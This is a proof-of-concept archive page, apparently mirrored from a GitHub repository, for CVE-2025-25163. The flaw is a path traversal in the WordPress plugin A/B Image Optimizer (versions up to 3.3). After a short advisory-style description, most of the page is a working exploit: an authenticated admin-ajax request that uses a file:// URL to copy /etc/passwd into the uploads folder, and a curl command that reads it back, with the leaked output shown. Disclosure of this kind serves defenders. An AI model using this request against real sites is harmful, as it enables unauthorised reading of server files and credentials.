POC详情: 398cfa85cd49c351a00cca79082200e758cfdc0f

来源
https://github.com/RandomRobbieBF/CVE-2025-25163
关联漏洞
标题: WordPress插件A/B Image Optimizer Plugin <= 3.3任意文件下载漏洞 (CVE-2025-25163)
描述:Zach Swetz Plugin A/B Image Optimizer插件存在路径限制不当('路径穿越')漏洞,允许路径穿越攻击。此问题影响Plugin A/B Image Optimizer版本从n/a至3.3。
描述
Plugin A/B Image Optimizer <= 3.3 - Authenticated (Subscriber+) Arbitrary File Download
介绍
# CVE-2025-25163
Plugin A/B Image Optimizer <= 3.3 - Authenticated (Subscriber+) Arbitrary File Download

# Description

The Plugin A/B Image Optimizer plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.

## Details

- **Type**: plugin
- **Slug**: images-optimizer
- **Affected Version**: 3.3
- **CVSS Score**: 6.5
- **CVSS Rating**: Medium
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
- **CVE**: CVE-2025-25163
- **Status**: Closed

POC
---

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal:8929
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: wp-settings-1=product_cat_tab%3Dpop%26libraryContent%3Dbrowse; wp-settings-time-1=1739543461; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_f0174336378e6db874da2237e8c05ac1=superadmin%7C1740046038%7C1N8xr9D0vHFOPOWEa8SZgQgnMrADwNBlBuy2clxo5pS%7C1e77f848b7d3c4d32746de6c747e981273be0adb56efe08902946257e29284fe; tk_ai=woo%3AHJ877y%2BjNWutqlxgSuyOlVs2; woocommerce_items_in_cart=1; woocommerce_cart_hash=00dd4812a167442476e6e7ea663fc03e; wp_woocommerce_session_f0174336378e6db874da2237e8c05ac1=1%7C%7C1740046039%7C%7C1740042439%7C%7C81057c84ecef3df59f0857082ef7c538
Priority: u=4
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

action=ab_save_image_locally&imageUrl=file:///etc/passwd
```

```
{"id":5006,"url":"http:\/\/kubernetes.docker.internal:8929\/wp-content\/uploads\/2025\/02\/1739874247.gif"}
```

```
$ curl http://kubernetes.docker.internal:8929/wp-content/uploads/2025/02/1739874247.gif
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
```
文件快照

 [4.0K]  /data/pocs/398cfa85cd49c351a00cca79082200e758cfdc0f
└── [2.7K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。